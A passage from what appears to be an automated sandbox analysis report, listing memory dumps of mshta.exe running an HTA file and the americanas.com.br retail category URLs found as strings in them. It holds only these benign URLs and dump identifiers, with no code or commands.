00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509074640.000000000BE8F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/f/loja-Americanas
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559750595.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574494320.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/presepio
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559750595.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574494320.000000000961C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/toalha-de-mesa-natalina
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559750595.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/velas-e-casticais-natalinos
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal?chave=pfm_home_natal_menu
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal_S
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510777921.00000000096F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natalin
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/esporte-e-lazer?chave=dk_hm_at_esporte
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574087890.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/esporte-e-lazer?chave=pfm_home_esporte_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554832793.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/games?chave=pfm_home_games_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559750595.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574494320.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/gift-card
Source: mshta.exe, 00000001.00000003.12401711671.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12402284245.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12462713387.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12402767156.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/gift-card?chave=dk_hm_ats_2_10_giftcardmeta.smallmeta.small.
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551257362.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/gift-card?chave=pfm_home_gc_menu
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574962923.000000000967A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/gift-cardve
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558057036.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558057036.000000000A98D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A987000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541754594.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12549952415.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542732517.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577367389.000000000A991000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542732517.000000000A98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510847946.00000000096C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=dk_hm_at_infoacess
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=dk_hm_at_infoacesse
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=dk_hm_at_infoacessim
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567402670.000000000C140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580125535.000000000C141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570396269.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12485820978.0000000009DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=pfm_hm_tt_1_0_informatica-e-a
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 